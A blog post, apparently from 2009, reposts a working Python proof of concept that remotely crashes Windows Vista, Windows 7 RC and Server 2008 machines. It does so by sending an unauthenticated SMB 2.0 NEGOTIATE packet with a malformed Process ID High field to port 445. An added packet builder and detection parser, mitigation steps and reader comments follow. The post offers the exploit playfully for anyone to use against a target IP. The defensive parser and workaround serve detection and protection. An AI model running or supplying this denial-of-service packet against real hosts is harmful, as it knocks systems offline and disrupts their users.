Good times again with Remote BSOD
Remember the good old days when you could teardrop someone running Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for a limited time only, we can relive that experience until Microsoft releases a security patch. The trigger is a single malformed field in an SMB NEGOTIATE PROTOCOL REQUEST sent to TCP port 445; the SMB 2.0 server crashes while handling it, and because negotiation happens before any login, no credentials are needed. This affects Windows Vista and Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let's hope they release a security patch before Windows 7 officially launches.
Here’s the proof of concept. I’m going to keep a copy here just in case.
Smb-Bsod.py:
#!/usr/bin/python
# When the SMB 2.0 server receives a "&" character (0x26) in the "Process Id High"
# SMB header field of a NEGOTIATE PROTOCOL REQUEST, it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA bugcheck.
from socket import socket
from time import sleep  # not used in this PoC

host = ("IP_ADDR", 445)  # replace IP_ADDR with the target's address; SMB over TCP 445
buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message: 0x90 = 144 bytes of SMB follow
    b"\xff\x53\x4d\x42"  # Begin SMB header: Server Component "\xffSMB"
    b"\x72\x00\x00\x00"  # Command 0x72: Negotiate Protocol; NT Status (first 3 bytes)
    b"\x00\x18\x53\xc8"  # NT Status (last byte), Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: the trigger; normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # Signature, Reserved, TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, then dialects
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # "PC NETWORK PROGRAM 1.0"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"  # "LANMAN1.0"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"  # "Windows for Workgroups 3.1a"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  # "LM1.2X002", "LANMAN2.1"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"  # "NT LM 0.12"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"  # "SMB 2.002": the dialect that hands the request to the SMB 2.0 server
    b"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
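An added example, not part of the original post or of the PoC author's code: the request above rebuilt from named SMB header fields, plus a parser for captured NetBIOS session messages that flags the malformed shape (a NEGOTIATE PROTOCOL REQUEST that offers an SMB2 dialect while carrying a non-zero Process ID High). Given the "\x00\x26" field the builder reproduces the 148-byte PoC packet byte for byte, so the two can be checked against each other. The "suspicious" verdict is my own heuristic, derived from the PoC's note that the field is normally zero; it is not a signature published by Microsoft, and the field names follow the SMB1 header layout (protocol id, command, status, flags, flags2, PID High, signature, reserved, TID, PID, UID, MID).

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_HEADER_LEN = 32

# Dialects the PoC offers, in its order. The last one is what makes an
# SMB2-capable server hand the request to its SMB2 code path.
POC_DIALECTS = (
    b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
    b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002",
)

# The 148-byte request from the PoC above (4-byte NetBIOS session header + SMB).
POC_REQUEST = (
    b"\x00\x00\x00\x90"
    b"\xff\x53\x4d\x42"
    b"\x72\x00\x00\x00"
    b"\x00\x18\x53\xc8"
    b"\x00\x26"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)


def build_negotiate(pid_high=b"\x00\x00", dialects=POC_DIALECTS):
    """NetBIOS session message carrying an SMB1 NEGOTIATE request.

    pid_high is copied verbatim into the 2-byte Process ID High field at
    SMB header offset 12; every other field takes the value the PoC uses.
    """
    header = struct.pack(
        "<4sBIBH2s8sHHHHH",
        SMB_MAGIC, SMB_COM_NEGOTIATE,
        0,             # NT status
        0x18,          # Flags
        0xC853,        # Flags2 (bytes 53 c8 on the wire)
        pid_high,      # Process ID High
        b"\x00" * 8,   # SecuritySignature
        0,             # Reserved
        0xFFFF,        # TID
        0xFEFF,        # PID (bytes ff fe on the wire)
        0,             # UID
        0,             # MID
    )
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = header + struct.pack("<BH", 0, len(data)) + data  # WordCount, ByteCount
    return struct.pack(">I", len(smb)) + smb  # type 0x00 + 3-byte big-endian length


def parse_negotiate(msg):
    """Decode one session message; return header fields and a heuristic verdict.

    'suspicious' is True for a NEGOTIATE request that offers an SMB2 dialect
    while carrying a non-zero Process ID High, i.e. the shape of the PoC packet.
    """
    if len(msg) < 4 + SMB_HEADER_LEN + 3:
        raise ValueError("too short for a session message with an SMB header")
    if msg[0] != 0 or int.from_bytes(msg[1:4], "big") != len(msg) - 4:
        raise ValueError("bad NetBIOS session message framing")
    smb = msg[4:]
    (magic, command, _status, flags, flags2, pid_high, _sig, _resv,
     _tid, pid, _uid, _mid) = struct.unpack("<4sBIBHH8sHHHHH", smb[:SMB_HEADER_LEN])
    if magic != SMB_MAGIC:
        raise ValueError("not an SMB1 header")
    word_count = smb[SMB_HEADER_LEN]
    bc_off = SMB_HEADER_LEN + 1 + 2 * word_count  # ByteCount follows the parameter words
    if len(smb) < bc_off + 2:
        raise ValueError("WordCount runs past the end of the message")
    byte_count, = struct.unpack("<H", smb[bc_off:bc_off + 2])
    data = smb[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the message")
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:  # BufferFormat byte that starts each dialect string
            raise ValueError("malformed dialect entry at offset %d" % pos)
        end = data.index(b"\x00", pos + 1)
        dialects.append(data[pos + 1:end])
        pos = end + 1
    offers_smb2 = any(d.startswith(b"SMB 2.") for d in dialects)
    return {
        "command": command, "flags": flags, "flags2": flags2, "pid_high": pid_high,
        "pid": pid, "dialects": dialects, "offers_smb2": offers_smb2,
        "suspicious": command == SMB_COM_NEGOTIATE and pid_high != 0 and offers_smb2,
    }
```

Feed parse_negotiate() the payload of each TCP 445 segment from a capture, one complete session message at a time. On the PoC bytes it reports pid_high 0x2600 (the wire bytes 00 26 read little-endian; the "&" the PoC comment refers to is the 0x26 byte) and suspicious=True; on build_negotiate() with the default zero field, or on the PoC field with the "SMB 2.002" dialect removed, it reports suspicious=False. A false positive needs a legitimate client that sets Process ID High on a NEGOTIATE, which is uncommon, but confirm that on your own traffic before alerting on it.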
To keep your computer from BSODing until the patch ships, disable SMB 2.0 (Microsoft's advisory 975497 workaround sets a DWORD named Smb2 to 0 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters and restarts the Server service, after which clients fall back to SMB1) or block TCP ports 445 and 139 at the firewall. The request needs no authentication, so we might even see some script kiddie wrap it in a simple teardrop-style application to BSOD your computer.
Ah! The good old days again.
== Update ==
Windows 7 RTM and Windows Server 2008 R2 already contain the fix. This exploit only works on Windows Vista, Windows Server 2008 and the Windows 7 RC.
Original Post: Microsoft Security Advisory 975497 Released
== End Update ==
Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
The code does not work. The author has forgotten to add:
from socket import socket
Importing sleep is redundant, as it is not used in the code. I have made some minor changes and published it on http://bit.ly/Zf7P5. Unfortunately, I do not have a Vista/7 machine to try out the code. Have you tried it yet?
@Hongster: No, the author didn't forget to add
from socket import socket
Probably Justin missed that line when copying from the original article here:
http://seclists.org/fulldisclosure/2009/Sep/39
As for the sleep, it was used during his fuzzing, as I feel he didn't want to flood it.
The code does work.
@Justin: There is another SMB bug in Win 7 and Win 2008 R2, discussed here:
http://seclists.org/fulldisclosure/2009/Nov/134
Have fun.